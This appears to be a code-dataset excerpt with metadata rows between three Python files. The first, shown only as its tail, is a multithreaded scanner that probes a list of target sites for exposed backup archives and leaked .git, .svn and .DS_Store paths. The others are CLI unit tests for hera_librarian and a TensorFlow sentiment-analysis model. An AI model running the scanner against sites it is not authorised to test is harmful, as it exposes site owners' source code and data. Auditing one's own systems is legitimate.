    # Generic backup/VCS paths tried against every target.
    inurl = {"/www.zip", "/www.rar", "/www.tar.gz",
             "/wwwroot.zip", "/wwwroot.rar", "/wwwroot.tar.gz",
             "/web.zip", "/web.rar", "/web.tar.gz",
             "/.svn", "/.git", "/.DS_Store",
             "/1.zip", "/1.rar"}
    # Archive extensions combined with the host name and its dot-parts.
    hz = {".zip", ".rar", ".tar.gz"}

    # Fixed: file handle was previously leaked (open() without close).
    with open(r'./runoob.txt', 'r') as f:
        link_list = f.readlines()

    # Fixed: the IPv4 matcher was recompiled once per target; hoist it.
    compile_rule = re.compile(r'(?<![\.\d])(?:\d{1,3}\.){3}\d{1,3}(?![\.\d])')

    newlink_list = []
    for i in link_list:
        i = i.replace("\n", "")
        for s in inurl:
            newlink_list.append(i + s)
        # Bare IPv4 targets get only the generic paths, not names derived
        # from a (nonexistent) domain.
        if re.findall(compile_rule, i):
            continue
        if i.startswith("https://"):
            host = i.replace("https://", "")
        elif i.startswith("http://"):
            host = i.replace("http://", "")
        else:
            continue
        # e.g. https://a.example.com -> /a.example.com.zip, /a.zip,
        # /example.zip, /com.zip (and .rar/.tar.gz variants).
        for index in hz:
            newlink_list.append(i + '/' + host + index)
        for top in host.split('.'):
            for end in hz:
                newlink_list.append(i + '/' + top + end)

    # Fixed: `while num <= thnum` previously created thnum+1 (101) workers.
    thnum = 100
    workQueue = Queue.Queue(3000)
    threads = []
    for n in range(thnum):
        thread = myThread("thread" + str(n), workQueue)
        thread.start()
        threads.append(thread)

    # Feed the pool, then wait for every worker to drain the queue and
    # time out.
    for url in newlink_list:
        workQueue.put(url)
    for t in threads:
        t.join()
    print("end")
3,685
12
122
e9bfb50a19a589a69f5030410dca17dc1c9ab50c
3,539
py
Python
hera_librarian/tests/test_cli.py
BrianJKoopman/librarian
2d4164b60fe41d1a192f03d8baad12c0d11d0394
[ "BSD-2-Clause" ]
5
2016-02-17T17:51:05.000Z
2021-12-09T19:08:17.000Z
hera_librarian/tests/test_cli.py
BrianJKoopman/librarian
2d4164b60fe41d1a192f03d8baad12c0d11d0394
[ "BSD-2-Clause" ]
60
2016-01-29T20:40:04.000Z
2021-05-28T14:13:18.000Z
hera_librarian/tests/test_cli.py
simonsobs/librarian
188370d84a988f898bb9de4593078c1868602f08
[ "BSD-2-Clause" ]
6
2017-11-13T10:40:34.000Z
2020-07-10T00:42:57.000Z
# -*- mode: python; coding: utf-8 -*- # Copyright 2019 the HERA Collaboration # Licensed under the 2-clause BSD License """Test code in hera_librarian/cli.py """ import pytest import os import hera_librarian from hera_librarian import cli
26.214815
81
0.65414
# -*- mode: python; coding: utf-8 -*-
# Copyright 2019 the HERA Collaboration
# Licensed under the 2-clause BSD License

"""Test code in hera_librarian/cli.py

"""

import pytest
import os

import hera_librarian
from hera_librarian import cli


def test_die(capsys):
    """cli.die must write "error: <msg>" to stderr and exit with status 1,
    with and without printf-style replacement args.
    """
    # test without specifying replacement args
    with pytest.raises(SystemExit) as e:
        cli.die("my error")
    captured = capsys.readouterr()
    assert e.type == SystemExit
    assert e.value.code == 1
    assert captured.err == "error: my error\n"

    # test with replacement args
    with pytest.raises(SystemExit) as e:
        cli.die("my %s", "error")
    captured = capsys.readouterr()
    assert e.type == SystemExit
    assert e.value.code == 1
    assert captured.err == "error: my error\n"

    return


def test_print_table(capsys):
    """cli.print_table must render a column-aligned table, honor an explicit
    column order and optional header names, and raise ValueError when the
    header count does not match the column count.

    NOTE(review): the expected-table literals below were recovered from a
    whitespace-collapsed copy of this file; intra-row alignment padding may
    have been lost — confirm against the actual cli.print_table output.
    """
    # define dicts
    dict1 = {"name": "foo", "size": 10}
    dict2 = {"name": "bar", "size": 12}
    dict_list = [dict1, dict2]
    col_list = ["name", "size"]
    col_names = ["Name of file", "Size of file"]

    # test without specifying order
    cli.print_table(dict_list)
    captured = capsys.readouterr()
    stdout = captured.out
    correct_table = """name | size
---- | ----
foo | 10
bar | 12
"""
    assert stdout == correct_table

    # test without column names
    cli.print_table(dict_list, col_list)
    captured = capsys.readouterr()
    stdout = captured.out
    assert stdout == correct_table

    # test with column names
    cli.print_table(dict_list, col_list, col_names)
    captured = capsys.readouterr()
    stdout = captured.out
    correct_table = """Name of file | Size of file
------------ | ------------
foo | 10
bar | 12
"""
    assert stdout == correct_table

    # test using the wrong number of column headers
    with pytest.raises(ValueError):
        cli.print_table(dict_list, col_list, col_names[:1])

    return


def test_sizeof_fmt():
    """cli.sizeof_fmt must format byte counts with binary (1024-based)
    prefixes from B up through YB.
    """
    # test a few known values
    bts = 512
    assert cli.sizeof_fmt(bts) == "512.0 B"

    bts = 1024
    assert cli.sizeof_fmt(bts) == "1.0 kB"

    bts = 1024**2
    assert cli.sizeof_fmt(bts) == "1.0 MB"

    bts = 1024**3
    assert cli.sizeof_fmt(bts) == "1.0 GB"

    bts = 1024**4
    assert cli.sizeof_fmt(bts) == "1.0 TB"

    bts = 1024**5
    assert cli.sizeof_fmt(bts) == "1.0 PB"

    bts = 1024**6
    assert cli.sizeof_fmt(bts) == "1.0 EB"

    bts = 1024**7
    assert cli.sizeof_fmt(bts) == "1.0 ZB"

    bts = 1024**8
    assert cli.sizeof_fmt(bts) == "1.0 YB"

    return


def test_generate_parser():
    """cli.generate_parser must register every expected CLI subcommand.

    NOTE(review): reaches into argparse internals (_subparsers /
    _group_actions) — brittle against argparse changes, but that is the
    existing approach.
    """
    ap = cli.generate_parser()

    # make sure we have all the subparsers we're expecting
    available_subparsers = tuple(ap._subparsers._group_actions[0].choices.keys())
    assert "add-file-event" in available_subparsers
    assert "add-obs" in available_subparsers
    assert "launch-copy" in available_subparsers
    assert "assign-sessions" in available_subparsers
    assert "delete-files" in available_subparsers
    assert "locate-file" in available_subparsers
    assert "initiate-offload" in available_subparsers
    assert "offload-helper" in available_subparsers
    assert "search-files" in available_subparsers
    assert "set-file-deletion-policy" in available_subparsers
    assert "stage-files" in available_subparsers
    assert "upload" in available_subparsers

    return


def test_main(script_runner):
    """`librarian -V` must print the installed package version.

    Uses the pytest-console-scripts `script_runner` fixture to invoke the
    installed entry point.
    """
    version = hera_librarian.__version__
    ret = script_runner.run("librarian", "-V")
    assert ret.stdout == "librarian {}\n".format(version)
3,177
0
115
15f861d098e92c2a6abe585f495d1e9b5cf29ce8
8,031
py
Python
models/architectures.py
hsqmlzno1/Transferable-E2E-ABSA
6083af24892c93703ed6695aff277d54d4b426c6
[ "MIT" ]
73
2019-08-14T09:25:02.000Z
2022-03-25T07:19:45.000Z
models/architectures.py
hsqmlzno1/Transferable-E2E-ABSA
6083af24892c93703ed6695aff277d54d4b426c6
[ "MIT" ]
3
2020-02-25T06:39:52.000Z
2020-12-26T12:40:23.000Z
models/architectures.py
hsqmlzno1/Transferable-E2E-ABSA
6083af24892c93703ed6695aff277d54d4b426c6
[ "MIT" ]
13
2019-09-22T03:45:21.000Z
2021-11-22T06:52:28.000Z
import tensorflow as tf from nn_utils import * import numpy as np import nn_utils
48.08982
163
0.528826
import tensorflow as tf
from nn_utils import *
import numpy as np
import nn_utils


class SuperNN(object):
    """TF1 graph model for transferable end-to-end aspect-based sentiment
    analysis: a BiLSTM encoder, a multi-hop dual (aspect/opinion) memory
    attention with bilinear relation tensors, a second BiLSTM, and three
    FC taggers (aspect boundary, opinion, targeted-sentiment).

    Shape comments use: b = batch, m = max_len, win = input window,
    d = word-embedding dim.
    """

    def __init__(self, args, word2vec, init=None, scope=None):
        # args: hyper-parameter namespace; word2vec: embedding matrix tensor;
        # init: variable initializer callable taking a shape list;
        # scope: tf variable scope name for all model variables.
        self.args = args
        self.word2vec = word2vec
        self.init = init
        self.scope = scope
        self.hops = args.hops                  # number of attention hops
        self.max_len = args.max_len            # padded sequence length m
        self.input_win = args.input_win
        self.dim_w = args.dim_w                # word embedding dim
        self.dim_asp_h = args.dim_asp_h        # aspect LSTM hidden dim
        self.dim_opn_h = args.dim_opn_h        # opinion memory dim
        self.dim_ts_h = args.dim_ts_h          # targeted-sentiment LSTM dim
        self.dim_rel = args.dim_rel            # relation-tensor slice count
        self.dim_ote_y = args.dim_ote_y        # aspect tag set size
        self.dim_ts_y = args.dim_ts_y          # sentiment tag set size
        self.dim_lm_y = args.dim_lm_y          # opinion tag set size
        self.ote_tag_vocab = args.ote_tag_vocab
        self.ts_tag_vocab = args.ts_tag_vocab
        # Variables are created eagerly so __call__ can be invoked with
        # reuse=True for weight sharing across domains/graph branches.
        self.build_vars()

    def build_vars(self):
        """Create all trainable variables under self.scope."""
        with tf.variable_scope(self.scope):
            # Fusion projections used inside tensor_product to update the
            # sequence representation with the current memory.
            self.Wa = tf.Variable(self.init([2*self.dim_asp_h+2*self.dim_asp_h, 2*self.dim_asp_h]), name='Wa')
            self.Wo = tf.Variable(self.init([2*self.dim_asp_h+2*self.dim_opn_h, 2*self.dim_asp_h]), name='Wo')
            self.bias_a = tf.Variable(self.init([2*self.dim_asp_h, ]), name='bias_a')
            self.bias_o = tf.Variable(self.init([2*self.dim_asp_h, ]), name='bias_o')
            # relation matrices between aspect&aspect, opinion&opinion, aspect&opinion
            self.Ta = tf.Variable(self.init([self.dim_rel, 2*self.dim_asp_h, 2*self.dim_asp_h]), name='Ta')
            self.To = tf.Variable(self.init([self.dim_rel, 2*self.dim_opn_h, 2*self.dim_opn_h]), name='To')
            self.Tao = tf.Variable(self.init([self.dim_rel, 2*self.dim_asp_h, 2*self.dim_opn_h]), name='Tao')
            # Scoring vectors turning relation features into attention logits.
            self.va = tf.Variable(self.init([2*self.dim_rel]), name='v_a')
            self.vo = tf.Variable(self.init([2*self.dim_rel]), name='v_o')

    def __call__(self, win_reviews, batch_length, ma_0, mo_0, dropout_rate, reuse=False):
        """Build the forward graph for one batch.

        :param win_reviews: int token-id tensor; 0 is treated as padding
            (mask = sign(ids)).
        :param batch_length: per-example true lengths for the dynamic RNNs.
        :param ma_0: initial aspect memory, shape (1, 2*dim_asp_h) — tiled
            over the batch. NOTE(review): assumed from the tf.tile pattern;
            confirm against the caller.
        :param mo_0: initial opinion memory, tiled likewise.
        :param dropout_rate: keep-probability passed to tf.nn.dropout.
        :param reuse: reuse variable scopes (weight sharing).
        :returns: (asp_h, ts_h, asp_pred, opn_pred, ts_pred, a_summary,
            o_summary, alpha_a, alpha_o) — flattened features, per-token tag
            logits, final memory summaries, and the last-hop attentions.
        """
        with tf.variable_scope(self.scope, reuse=reuse):
            with tf.variable_scope("Embedding_layer"):
                # Padding ids are 0, so sign() yields a {0,1} float mask.
                mask = tf.cast(tf.sign(win_reviews), tf.float32)
                self.input_emb = tf.nn.embedding_lookup(self.word2vec, win_reviews)  #(b, m, win, d)
                self.input_emb = tf.nn.dropout(self.input_emb, dropout_rate)
            with tf.variable_scope('LSTM-OTE'):
                fw_cell = tf.contrib.rnn.LSTMCell(self.dim_asp_h)
                bw_cell = tf.contrib.rnn.LSTMCell(self.dim_asp_h)
                outputs, states = tf.nn.bidirectional_dynamic_rnn(fw_cell, bw_cell, self.input_emb,
                                                                  sequence_length=batch_length, dtype=tf.float32)
                asp_h = tf.concat(outputs, -1)  #(b, m, 2*dim_asp_h)
            with tf.variable_scope('Attention'):
                # Broadcast the learned initial memories over the batch.
                ma_t = tf.tile(ma_0, [tf.shape(asp_h)[0], 1])  #(b, 2*dim_asp_h)
                mo_t = tf.tile(mo_0, [tf.shape(asp_h)[0], 1])  #(b, 2*dim_opn_h)
                za_list, zo_list = [], []
                ma_list, mo_list = [], []
                ma_list.append(ma_t)  # (b, 2*dim_asp_h)
                mo_list.append(mo_t)  # (b, 2*dim_opn_h)
                for l in range(self.hops):
                    # Relation features of each token w.r.t. both memories.
                    za = tf.concat([self.tensor_product(asp_h, ma_t, self.Ta, self.Wa, self.bias_a, dropout_rate),  #(b, m, dim_rel)
                                    self.tensor_product(asp_h, mo_t, self.Tao, self.Wo, self.bias_o, dropout_rate)],  #(b, m, dim_rel)
                                   -1)  #(b, m, 2*dim_rel)
                    zo = tf.concat([self.tensor_product(asp_h, mo_t, self.To, self.Wo, self.bias_o, dropout_rate),  #(b, m, dim_rel)
                                    self.tensor_product(asp_h, ma_t, tf.transpose(self.Tao, [0, 2, 1]), self.Wa, self.bias_a, dropout_rate)],  #(b, m, dim_rel)
                                   -1)  #(b, m, 2*dim_rel)
                    za_l = tf.reshape(za, [-1, 2*self.dim_rel])  #(b*m, 2*dim_rel)
                    zo_l = tf.reshape(zo, [-1, 2*self.dim_rel])  #(b*m, 2*dim_rel)
                    za_list.append(za_l)
                    zo_list.append(zo_l)
                    # Attention logits = relation features scored by va/vo.
                    ea_l = tf.reduce_sum(tf.multiply(za_l, self.va), -1)  #(b*m)
                    eo_l = tf.reduce_sum(tf.multiply(zo_l, self.vo), -1)  #(b*m)
                    ea_l = tf.reshape(ea_l, [-1, self.max_len])  #(b,m)
                    eo_l = tf.reshape(eo_l, [-1, self.max_len])  #(b,m)
                    # Masked softmax keeps padding tokens at zero weight.
                    alpha_a = tf.expand_dims(nn_utils.mask_softmax(ea_l, axis=1, mask=mask), -1)  #(b,m,1)
                    alpha_o = tf.expand_dims(nn_utils.mask_softmax(eo_l, axis=1, mask=mask), -1)  #(b,m,1)
                    # Residual memory update with the attention summary.
                    a_summary = tf.reduce_sum(asp_h * alpha_a, 1)  #(b, 2*dim_asp_h)
                    ma_t = ma_t + a_summary
                    o_summary = tf.reduce_sum(asp_h * alpha_o, 1)  #(b, 2*dim_asp_h)
                    mo_t = mo_t + o_summary
                    ma_list.append(ma_t)  #(b, 2*dim_asp_h)
                    mo_list.append(mo_t)  #(b, 2*dim_opn_h)
                # Last hop's relation features become the tagger inputs.
                asp_h = za_list[-1]
                opn_h = zo_list[-1]
                asp_h = tf.reshape(asp_h, [-1, self.max_len, 2*self.dim_rel])
                opn_h = tf.reshape(opn_h, [-1, self.max_len, 2*self.dim_rel])
            with tf.variable_scope('LSTM-TS'):
                fw_cell = tf.contrib.rnn.LSTMCell(self.dim_ts_h)
                bw_cell = tf.contrib.rnn.LSTMCell(self.dim_ts_h)
                outputs, states = tf.nn.bidirectional_dynamic_rnn(fw_cell, bw_cell, asp_h,
                                                                  sequence_length=batch_length, dtype=tf.float32)
                ts_h = tf.concat(outputs, -1)  #(b, m, 2*dim_ts_h)
            with tf.variable_scope('FC_layer'):
                asp_h = tf.nn.dropout(asp_h, dropout_rate)
                opn_h = tf.nn.dropout(opn_h, dropout_rate)
                ts_h = tf.nn.dropout(ts_h, dropout_rate)
                # Flatten (b, m, d) -> (b*m, d) for the per-token taggers.
                asp_h = tf.reshape(asp_h, [-1, asp_h.shape.as_list()[-1]])
                opn_h = tf.reshape(opn_h, [-1, opn_h.shape.as_list()[-1]])
                ts_h = tf.reshape(ts_h, [-1, ts_h.shape.as_list()[-1]])
                asp_pred = nn_utils.fc_layer(asp_h, output_dim=self.dim_ote_y, scope="asp_tagger", reuse=reuse)
                opn_pred = nn_utils.fc_layer(opn_h, output_dim=self.dim_lm_y, scope="opn_tagger", reuse=reuse)
                ts_pred = nn_utils.fc_layer(ts_h, output_dim=self.dim_ts_y, scope="ts_tagger", reuse=reuse)
        return asp_h, ts_h, asp_pred, opn_pred, ts_pred, a_summary, o_summary, tf.squeeze(alpha_a, 2), tf.squeeze(alpha_o, 2)

    def tensor_product(self, a, b, T, W, bias, dropout_rate, activation=None):
        """Bilinear relation score of each position of `a` against vector `b`.

        First fuses each position of a with b through a residual ReLU
        projection (W, bias), then scores it against b through each of the
        dim_rel slices of relation tensor T.

        :param a: (b, m, d_a) sequence; b: (b, d_b) memory vector.
        :param T: (dim_rel, d_a, d_b) relation tensor (dropout applied).
        :returns: (b, m, dim_rel) relation features, optionally activated.
        """
        _, element_size, a_dim = a.shape.as_list()
        _, b_dim = b.shape.as_list()
        emb_dim = T.shape.as_list()[-1]
        T_dropout = tf.nn.dropout(T, dropout_rate)
        a_re = tf.reshape(a, [-1, a_dim])  #(b*m, d_a)
        b_tile = tf.tile(tf.expand_dims(b, 1), [1, element_size, 1])  #(b, m, d_b)
        ab_fusion = tf.reshape(tf.concat([a, b_tile], -1), [-1, a_dim+b_dim])  #(b*m, d_a+d_b)
        # Residual update: each position absorbs the memory before scoring.
        a_re = a_re + tf.nn.relu(tf.matmul(ab_fusion, W) + bias)  #(b*m, d_a)
        # One scalar per position per relation slice T_k: (a_re @ T_k) . b
        output = tf.concat([tf.matmul(
            tf.reshape(tf.matmul(a_re, T_k), [-1, element_size, emb_dim]),
            tf.expand_dims(b, -1)) for T_k in tf.unstack(T_dropout, axis=0)], -1)
        if activation != None:
            output = activation(output)
        return output
7,801
1
140